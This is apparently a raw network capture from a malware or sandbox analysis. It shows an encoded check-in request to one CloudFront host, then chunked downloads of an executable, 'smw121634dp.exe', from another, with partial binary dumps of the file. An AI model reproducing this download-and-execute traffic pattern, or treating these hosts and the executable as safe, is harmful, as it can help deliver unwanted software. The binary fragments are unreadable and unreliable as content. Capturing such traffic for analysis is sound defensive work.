GET /p.ashx?e=043Mckb8Lnhw7iCtSAyu/ QhfXa/CCW5NPZS6pZIlAEr4Spdf2ZexL9An1YluClXsGG6qLQR8LceI9VTThLJ3UlF4mqrDXF/L3OhFAPbRTejORB6u31KNxKv6VolbFNDUxX212nyBDAafyyUl C9vORgvLZHT a72UC/bfWIAgSqinVSQQ1bE6yLXK7ul6nZPXUNd68JXUDrKwD6t b1ZfKiWnlKjT8nQI8HtM9wp5Tx0cXu7AB1uimF904v4t2DIApimWCrqakt3bH6c7GAHITnquSe8GwjLnPqEPf2/rl3s8pSKbhxWudjDabjiU15bfhBVTXmVIKy2EBoQQl304tsVuXqTBm48VmE3ZuCJs4y1aJnkp ScdBb0CbA7Wqcrbq8YHwKZS4RrSPwflTyFw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:58 GMT

X-Cache: Miss from cloudfront

Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)

X-Amz-Cf-Id: FLVgKiMRIXIw65z1htvDBY1YfN1U0R9J56DzZNT16K0TYEc46BPLLg==

GET /smw121634dp.exe HTTP/1.1

Range: bytes=0-249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:01 GMT

Content-Range: bytes 0-249999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: B-NB4C4upWTh9sx666RTwKjdFQiz_aRLPfClxajzrzhk1p5aClqPpg==

MZ......................@.............................................

..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i

u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....

oS.................\...........2.......p....@.........................

........a.4......................................s..........`B........

... 3.(............................................................p..

.............................text....[.......\.................. ..`.r

data.......p.......`..............@..@.data................r..........

....@....ndata...`...@...........................rsrc...`B.......D...v

..............@..@....................................................

......................................................................

............................................U....\.}..t .}.F.E.u..H...

..6B..H.P.u..u..u....r@..B...SV.5.6B..E.WP.u....r@..e...E..E.P.u....r@

..}..e....Lp@........FR..VV..U... M.......M....3.....FQ.....NU..M.....

.....VT..U.....FP..E...............E.P.M...Tp@..E...E.P.E.P.u....r@..u

....E..9}...w....~X.te.v4..Dp@....E.tU.}.j.W.E......E.......@p@..vXW..

Hp@..u..5<p@.W...E..E.h ...Pj.h..B.W...r@..u.W...u....E.P.u...\r@._

^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......t.G

.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV..i.

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=250000-499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:03 GMT

Content-Range: bytes 250000-499999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 8cGGfGwRI8B_IL6HDaIf33fRLi4ZrMwjjwHxMeiWT0NKu6xAGBAn_w==

HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..

Content-Length: 250000..Connection: keep-alive..Cache-Control: private

..Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT..Accept-Ranges: bytes..

ETag: "44deb3125cb9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: AS

P.NET..Date: Mon, 20 Mar 2017 00:20:03 GMT..Content-Range: bytes 25000

0-499999/3359008..X-Cache: Miss from cloudfront..Via: 1.1 7922e01ab53e

8f36477272573223ab35.cloudfront.net (CloudFront)..X-Amz-Cf-Id: 8cGGfGw

RI8B_IL6HDaIf33fRLi4ZrMwjjwHxMeiWT0NKu6xAGBAn_w==...ny.q..{k..........

.U....j..0[...2.......;\..L.....T.Q....Z.^...$A..s..)O|...u$....}.{q..

..j.....c....|$.~..k.x...z...K..C^#.....! 8.].!th..p......L...\.=K.m..

-.h.L.........w~...X..M....[..S.{. .ek3.VeR..Y.^.QaR..C...[t(..i^.N6..

.j.O.YGs.<)...x.x...Y....R....'.7..rt.].....d..A....[sym?/...T....w

h.......`.ww...kO.T.i.ep4O!....T.f.K.[..T.5...;.K...?...W...n\..a.'.t.

.-.bV@..W8PK=Q.....<.V@xZ...S.0q@iw3}BEi.).=\."Mm.>T.eL.....~...

.r..;....@.... ..Qu.......rP.U...s/*.[..i..j..!.*..u.H...GX....O=..V..

..m.lc.....E.][....>......@..&D..n.B)....db.=..7..Q....g...<....

?..ipU...\.F.Y.......K..9.......C........M_.Z_<.R6.......nO.....y.L

.Q...K.R";.|.........r.%..j4.1.N... .....B.o.@).*.>.H~N....8..r{M..

.w.....S0../..s.\...}..w.~...b;.Sw.L0.;D....Z N.E......2.B.6(....X..UZ

.@..O:3n.S...U..9. .jZ0U....O..v.........":j*..^~...............6.....

..i%.. . o.8..|.....tS).E..g.h#.O..#..\....L,.:..c.....1._'. ./.Z..g.v

]:.8xs.o.1....q..l..;....t..ZW....B..........rM......G......S.....

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=750000-999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:06 GMT

Content-Range: bytes 750000-999999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: xv60FsoCinZiXNy8Zd2f8DEi2-0SNRbuelKIwqOuswlbv7_QTYlp2w==

;..M..........H....V......\.........l1-.%...z....NF.......0... .e.2...

..F..>d.[.....v..TLN..%...G4...?.6..*<Y.O2...\&GNH.].4o...f.^o..

..g1L..?`......*......R......v.;a;E...Tm......P\~f.......X.:....\...@9

n.......@..].>.....=..`....T.cE.G.....U..l6..0....2....jH.&...wY..1

.zVn.T.R\.).*..nZ...m4....[.&5...V......j.....!.4..Np.......M.<..@7

..H|.'b......O..R....K...(V.kI..(S\...Q.Q.M......n.Q.<..3....s.j.b.

.....,.....f..n.LH..%.&PT KWK4....b}.'K..,L...)......u..."..}i....z...

..1b.S.i.K....)E...u.M...c%.sZ.c.Vf.....@.i.0.....a...L............&..

.2.3....*..<p....MM'.s..-b...M...Y@.Z......i......aTg.........tPg%.

............p...i..#.T..._./q.A.B.......1.........(.(.$!.i[./..$@..$T.

.b..b....\a7...5=3...!..:Z.[s.KBY....,.........P.|.}m@.X...f|..]...#..

..8W..]...s....q..f{NA..>A.n@#...=.S.j(A......1..;.F.*.M. .^_s .x.D

%...x.:..6.%.<..K.f.SW..o..=.A...|.&.0..(.D$.eb7[9m=7}.0......km.|.

"7..K ,.8.6.Ai..6.?.....mf...8 .Rl.wj.....,..d.k...6.f.R:..4/1.=...xp.

....9r1.K..z.j.W8.....$....."..E..(.c.B.^..r.??..c.B..cfp...z........d

..-........f..bP"K.=...9lJ1...|n...;Y_r\...{.Bw.)...&[....~..7....y`[.

.r....i..!...........7C.~..../y...B....^...._.;..N....Y=.tUYU6..hX..o.

.2.9......3"..a....F....c...Q.@m..^/\H..s....!%...y...ST.{...U....a..h

}N..7.(.V...Fy.....Ufu0.g]fOd.BX/...W......P....i$.f.\..h=.1....^..erB

........a..1U....5Q.T.c...x... ......S.z......Ep...`...-E.. I......uJ[

.1.O.>..t..5.............z.........8...2Or./..&..M....V7R..........

l@...N_....h.:e..aOd7...V.a\.J..o..TQ....t.RY..f0...R..'....4.....

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=1250000-1499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:06 GMT

Content-Range: bytes 1250000-1499999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 5qszbFpfEM6_n_SHqnSua2dClwcYhoalNqftFuUXQXLNifKQ_LQnmQ==

j..8|..R......4....I.rw..*V.....X.........&.|.D'.d..)2..#...e....R0.i.

....580.n=..o....I...q.U.4.o"F.....2J.A..P...0..b..q.Rz.}....n..5.q.."

..7.....B...T...Q...Go..Z`d.E..B.G....CY...Q._Pb.A...5.[......\../W_}D

.}..-5P...=...|..%w{...........Y.T,.H..J.1..~D..f..g...|..z..@.B....e.

G.2X.*......3..fpv.]A......].{.E.X..h.Cu ^@.$&.?Z....G_.......M.q...Pv

.......aa..i9k'd....W......c....P;;.......}%...r....r...I.UE(.......N\

...VV~..c...w........>...,.l...*.4...........ye...qD......t ...>

..@........^..M.....{.....\E.z....s.e....n..1.}..^..V......:H.A.!..i|.

G'@....%........@.'#..dI..Jy`.9..'5..Fj.....F.j[..;.s...]..P...5...W..

..\.>.|f.?.............!.......|B.q...w......*..B...x,];./..m.}..kl

.L..>>\...ml&..fO.X.Ue....2....S....{.]k.Q..s.].....^..Jj..../.b

`...k.@C...Z.rE.G..>.8.={...v.A.w....(._..T..l.J...AgC.....T.....R.

.V ....IX&.!..g....Y0.......%...R..Tm.( ....AI......_.D..||.*./..<.

5....}...JC.".....J......Uq.A.-..J*..P.V...x...C7....]. ..c..-@9h..?v.

q.]d!..=...3....V.Zv.oT..c...d..q.&..rP...l:......a9;.j..........f.3..

.AC...w..E.tPS..~...[.{.,&.\.r$&......-s.......A../..l...9..[n......5.

R<Y.q.......r..$.UH(.pw..Ob.N..Q...,W0. D{l;...j.W.^.(..)gg.?....Z

.....8R.h......4]Q.g{0q...PZE^..sL..-Zx.v......k"...e=.(?.<.m......

O0.K.aY......u.<.&.O.iX.x..=.]S..$)....q......7...h;.....f....*O...

.x....N.gP.KA..`..X.M../...........MCZ...4..........M.....h....xx.D&.

E.\I...Kvr.nn..l.v.c.nqd..] t..!...4....]...{O..O...-jO....*.C...;h..*

<....Q.r.F\..#C...H......~.|...r...{.....2.?....?.J).........Z}

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=1500000-1749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:06 GMT

Content-Range: bytes 1500000-1749999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: A1qcf8jMm6EfdnLBl4pfkuyLfq9M7Uqf5dGsKlmAbbga_l7uEdSQdw==

.;%...F..u.......e...2..91HT....jS.@.tN,...:Ql.....6..Z....7..(y".X...

....r.....1X;....2B......;..Q.w.Y..T1....i.j...D<.}...]...4.....4{.

.C.\..>.8r....w|./....{.R....(EcW.p5?$.u.-T~u..x.....vL....'..C.jW.

H....S.........D4_U..{..P.{.^.g...)t.....%.Z.z..}..Q-...y.T...5}..Y..8

.CL....q..2. )D".J.....T".!<bITGCR......EI...#...].$.n..}q.#.t..3.F

.....:.I.0y.hV.V4...|aE.y..]Jn..7...<E$.L.?XS...si..az=...# t...w..

dkJ..|....9.>....l....yX..9.<.e......L.rC1....e.}<.~..bT..M.h

.FFuuF.a..?X....C..{....v..`..}.i..........`..{.:.G..._.$KS..vu.... "H

./..D...../..........C.....>...|1.kz....a..d.......@JE!...iR.v.....

`..h....|.......l......1..n...(I.......vLX.S..nN..<.......B.`Io.XR.

..[.Qs..Mp...'a......R..\.N..j..y.....3.H..P...^j....5..U.....P.o.X.jo

.......3..Zw....1............y/"...e.X.a...Q'^9m..Zm(D8...P...#E`..^).

."...Sm...N06..f.V......w...2......r.,..4....{.....<..y...7..i.....

...@R0zJcMT.H...D..&....rU.&...kC..#.._.t'r.6..i.......P...w..'0".Z...

7...D7M.Q.6.f#.......;.<1.=.D.q....o...7G.....R..%n...{..-_......@'

M.qV."n\,..7..N=V...)... .bY...........X...i.B.....;E..H'..P.UH".V...y

....{n...M....q.}.O...F5 .....E.F..../....z......8...X....X...b. :a._.

IG..,...k..{..."!v.a..p:..s.P..>.2._..@N..CeV........1..NbHe..}. *}

..4\..u8'..`....f:....qK..?.......3.#...&z.NM......>...}........6-/

.R<.I..t,.*2a.Ld<.s. ....r......`0..*..$.iWdu.X.dA...8......XD}.

..~uJ..`x.]S........_....%..D.o.w....y...n........O^..QH..%...PF...._.

..l.....W........u..U..1...e..z.'B22...7I...P.A.s.<.@...^.y...4

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=1750000-1999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:07 GMT

Content-Range: bytes 1750000-1999999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: O60HVq8xryQtoELtUxkF8_4apIxdbPGzEchY3NXfaSwuRUB2_efYeQ==

Tu..r..S...}....8..!....*..S?}.w.T.*8.......<...P..YQ......,X......

.BWC....`.J|... .......2..y].......Ds...x..^...b..,......z..]..wx.....

<...jn.R..o......W`.....'3H9....;....4..o.I....tK.fy..C.<...g...

..[..c.).".m..)....s......Z...j....v.5. .f.oF...&S.....G.-.~.\....c..^

.B.a....p.......K`..Fe..Z|..y. ..jp........0...... ..........J7..5..x.

N......N.... ....R.....Z.b....... ..N.W.....b.p.......pe.S...1.v9..1.m

-lC..5...8.n.@..P...^2....z.@. ........B......V..2..}.<.^.R..1"....

c..W ..%4....'l5&r......n.........I.7....s5...@..p.o.g..=.=.1.R...#..2

.j....E......!@..zG..Y-...8..g.K..q..cV...4...j.w.....i.... .W.B.f....

~..=Z...iEL...v~M...)....g.M..680....p..7.`a.....P.fVsN0.^k...h.8.qh..

.7.4........t..z...!..u.6...%..R...<..;.}Y..p....K|.........x?..,.#

:L....'O*..P.}...3d^..-?....u...L..{{.(.f.]..vptU`...../......>..3.

n7.o_....b. .GE^..i.IR.:.S....'..........q...m...._.T..l..R.....2..'..

m.....`..X....(....v1.c..........d.bm.\.........`.E;[|..%%e.m.....jUZ.

..n....! .{4t(u...<...>0G....Ub`.T......B...x.....Q..-s.{....,J^

e...1.]..56...9/4....)c.4z*~.GO%>T..5.3^....)....xvP....^40.;...J..

.!.9..G..UMx..d...a%.*.,..%8......}.V......! .`....N. s-...u.....R..1.

.......Qg.\E<..9'.....R...F..L.c..k..xq< #..ss..d.f.&..|..a..,..

IT............y...o$.&f..b.~%..TI..]@...~....|Q.'U.Z.o.{.!.K.!...<.

0......MX/...nP.R.LxL.-.wO...r.U..G.......>.......&..H.....C.-\..H.

..q...T&.5"....#m....&p.....B..,.{....,..%.4>7./...9.nf...#.P..y...

.<.H...A...fP,....J9[.......f'R...9V....LL.3.59..D...c@...].U..

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=2250000-2499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:07 GMT

Content-Range: bytes 2250000-2499999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 61z2GHNcv2SJ3EZCGA9l_0zla_R829QyYR1XaPZy4XAvFw6c-lfzJA==

HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..

Content-Length: 250000..Connection: keep-alive..Cache-Control: private

..Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT..Accept-Ranges: bytes..

ETag: "44deb3125cb9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: AS

P.NET..Date: Mon, 20 Mar 2017 00:20:07 GMT..Content-Range: bytes 22500

00-2499999/3359008..X-Cache: Miss from cloudfront..Via: 1.1 7922e01ab5

3e8f36477272573223ab35.cloudfront.net (CloudFront)..X-Amz-Cf-Id: 61z2G

HNcv2SJ3EZCGA9l_0zla_R829QyYR1XaPZy4XAvFw6c-lfzJA==...g$.X.#..2.u&..r.

Q-.......r.=..$....J.....1M.#uQ$..M.XCe..K9Jk].w\.:. ...c.....\.......

....{.s.E}-o.|..KC{`..D.=.....5..S........ .c_-..yN.6.U........4.....w

....)=!.b........!.q...@.....;I.>.......7. j...n...cjD.cs..(.....D.

.........n....(.mc!..=......$.........a...CPaw,r.*....}.V..n...E..oW..

l...b.....:o.7&.(............)...H...=.R......5..woY..O1..[.%1.}.. .Yq

_....Q..Y.8.I.....)..WU23m....(iMJc.".8^.<.e.S.?.D.6. ..m$K..a.....

G....c.Y.......F.A.DuEP....<........x..P8.s$..0.J........=..@.D.$.|

"...:..W...a....<...qq....S..,-.5O2"%-....Uah..2.......dJ..|Q....r.

.`C.,....Wp.]...S....tX;D....sP`B..]..0..Zq..SF.....<r.T.6(?..-..qK

~j`...........at....{.^.....N..b....MO.M....t1..B...sj".......Hrj.|..y

j^.Fq?xJ...;..d...0h}<].R.0......p..k...w.a:.A....{.z.AN.%?5.}...\*

w|/=s....T...n.v.&...}.Z.sf0.u,Ls.....R.BS..v.$Ao$...$.'.kh..)@....j?.

.2d..R....j3]x..js..nQ_EO.u..Vt..(..m.....[.0...=..xzfa.._W.0!{.....9?

..e&.....e..YB.jG<..q Fc.N..C%*......../...c..G.ab.6.......U.C.

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=2750000-2999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:08 GMT

Content-Range: bytes 2750000-2999999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: PbnrUwqUApr6PQSXhWpG9mCaD8OZ9r3J7nW8I5ZDgeRhArGZtOc_dQ==

HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..

Content-Length: 250000..Connection: keep-alive..Cache-Control: private

..Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT..Accept-Ranges: bytes..

ETag: "44deb3125cb9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: AS

P.NET..Date: Mon, 20 Mar 2017 00:20:08 GMT..Content-Range: bytes 27500

00-2999999/3359008..X-Cache: Miss from cloudfront..Via: 1.1 7922e01ab5

3e8f36477272573223ab35.cloudfront.net (CloudFront)..X-Amz-Cf-Id: PbnrU

wqUApr6PQSXhWpG9mCaD8OZ9r3J7nW8I5ZDgeRhArGZtOc_dQ==....@Q... <.....

&*..N@3...1....&CJ?..,....\....j..~&P..,p..l1....ssI..`..b9....#....cu

.....,..iWQ.....feG7..n.E,...yq..Nn....JUK..j......D.......X.R...Q...m

P.)...4.5.(....h.i...d..].c..#..q8?..K..i......,i...?.q=...z.......w.u

.#.....C1...4...O.8B..B.k...r.....G.......b..a.b4z..W..:P!..a..@...Z#&

gt;v..P.5..8.....M.8.......p/.VZ........e}...o-R....8Q.\...4{.3......,

..{..a....R_.........B\.x..J..M...~.AB.n.#.... .....RC..zFm...H..-.;..

..K.T.UR..9..=.%.6.).r0.lYw....)........y...3.......Y...*.Gw..Z0.c....

..S....sX.mA.........Dt?...4....F.o4..5..V..B..5./.4.5.)Z.7..8.m.K.a..

u...$....x......p.....\.;..Qx.%.......&(q..........W .....1[...c.,....

r.H....u..M..G.g...`..?x..<.w.YNe..]'.dWT'!...o.....m.Kf......w.1.3

.HW;... .......{d....U .c.x...1...HS^.qc.t...]a,.<.TOs.Y._....d ..

. 2`...!...rTH.K.ZN.?3@.......1.;..i[.1.!.'=.....q..Xz.iQ.U>.....cT

r...dz...8..PK.....9.`....Qug=.0P3.~..ksUg0.....S_m..>..6q0}.b..@&l

t;-U....{..m<........X]|..n..&.....z.~..kE..9Yy...N..)h...{...&

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=3250000-3359007

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 109008

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:09 GMT

Content-Range: bytes 3250000-3359007/3359008

X-Cache: Miss from cloudfront

Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: I31ccdgXE3qawaG5WkECGySddehcAOPF3r7sbp2_0ec9HAyJnKf0nA==

~....wR0sx.D..iw..z-..g.....%/....U|..s....xN.hD.'E....DvG....'O..m..b

I%.m..... e$ozE.\..........&.....J...M....6....."...U...v...z8v.3..N..

..\..isE..9...Q........'..o1"..-?..Uj....9..K.@:............z6:.[: n..

.%...i..U..-..x..........u...3.T.u<..k......a..q...A.=[..@?*r......

...K'.9.g..GU..5.}tSH.......\.......|..!r.L........?.o....k...e.4...AF

h..l"=......S..f:, 7...>z,...6..C..,.XD.`...2....x49gD.=......KU..u

..v../...'...D?.....w.4...U.Nz.$.....v..@K.......".g...&.....wCP=.W.6z

.[.........8AM...O.'...E. ..@.F.7W&.I`...J..&(.*}a.X.-..G6.c^....m...T

W).=Qf..[....X!.nn.......X......l.....D...{q...%!,.....).L:E..b^.b.5..

..A...qU... k.....A..A..%.i...x..'........Wm.....=-.?..2s......1g&].Z.

n...T.q...z.[....C...SUQ...\..?....%D.........-./d.(.....;...2........

..x.%/..ECi%.:...4.T},1rf....... {O.B.<..... ]}.....Z...."...=....&

gt;.^.`u...g....}..].w....U.M......C.iH....~ .VQ.g#.15.Cg....G.k...|.

C..H$.)..a...V)...*....X75NiO... ...H]....;....8...@L>....O... 1M..

...............yhG..F..=}.....1....W...A1..\.J ...x..O..(. .....'..t..

B2.m>gKp`.N`..F/..CrB8.E.^.;..h!.9.O.....m..,n..;'P..v..U...ww.R...

.$^iG...]E...ZF7A..h)'.j...lr.@.R....B).....|....V.J.,.H...4.X.ks.....

e.N.[......IQ.@...)...w...4.W........".e.].....8........t..#..........

giJeZ.......E..Ow..k...X......^G#b.=.w..x.2.t..................x.oKM..

d....K..UJb~...X.y..]....u.. ....V6..8.(7.........<....S......P!.A.

;.Jk......Dl^3...3.......S.v.o)j...........9...Ja\.'W.8...;#..]R...V.3

.vz..M)G.?.....X...r4........_.....5.B.B.._I.d.{..rJ ~.T...\.o....

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=500000-749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:03 GMT

Content-Range: bytes 500000-749999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 73bYzrGAQNmnG1baOMtjc5-dfLee3rDLMHTGLcQTJSulzOA0hZRqNA==

HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..

Content-Length: 250000..Connection: keep-alive..Cache-Control: private

..Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT..Accept-Ranges: bytes..

ETag: "44deb3125cb9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: AS

P.NET..Date: Mon, 20 Mar 2017 00:20:03 GMT..Content-Range: bytes 50000

0-749999/3359008..X-Cache: Miss from cloudfront..Via: 1.1 1f8a17c41295

fac39556a328869a62bd.cloudfront.net (CloudFront)..X-Amz-Cf-Id: 73bYzrG

AQNmnG1baOMtjc5-dfLee3rDLMHTGLcQTJSulzOA0hZRqNA==..G|....F...`#1.G....

.....Wk*..<......3~m._..y3.....t..=is..h._m.M8T.i.K.._u..k.........

AJ.v&-2H.......i..K......-.S.2G...-q..}..])f....ad.j..f..EV.G.}g.NVBSR

!~Ne3..."4........V...{g..i .k.....$v..z:..K......X..;.j(..e.3....p...

c).............qW}i.-....z!.S...]....a.=g_.n....yx.n.y|.a.....\.uy....

....5.~.9I"E..V..R.3XX.[..W.<.XfGK.....`Q.q..|..?.G..........7..M..

.U.-....YzK!....D'.*>...o.~G.b....j...X.=S. .l\v.A..P..}.....h.d.g|

..D:...L.ky...k..jL..o.(.e$|R..[.Y.....|...6*..;3.o...w.i...x%..(]D!n.

..).bK.........<.! ..@.>.-SU.R/p."..M....o_.i.u... d..{M]...,5j.

<.'........O..L5.l.. S..G.0KD.q.B..^...Vk...}~...*C..^.q... .!....*

0.._...f..j.?.....~ .m..(..]L.kK.......`..h..... ..{......`.jR...$..LI

.,.W...;.mp~2.3.[8mI...f..............K..B..y.?.yk...Mc..J..wX..;.f...

V0.n..T$~...d..f3..;...X......t...=.......W.Q.._../5.)..lF "../.e..=.F

.0...C..... A.*u......hP.o.v.8.........9%....!..0J..ipJb|..e...I..,..N

..9K..c...Sn......\4WA.k.#.....t. 1.}.H.......>.......?.{......

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=1000000-1249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:06 GMT

Content-Range: bytes 1000000-1249999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)

X-Amz-Cf-Id: GOtOcUaeRubNkdJJcxbDp34Q7UvWRt24FjfdWQixZSboFzckdf8XyA==

HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..

Content-Length: 250000..Connection: keep-alive..Cache-Control: private

..Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT..Accept-Ranges: bytes..

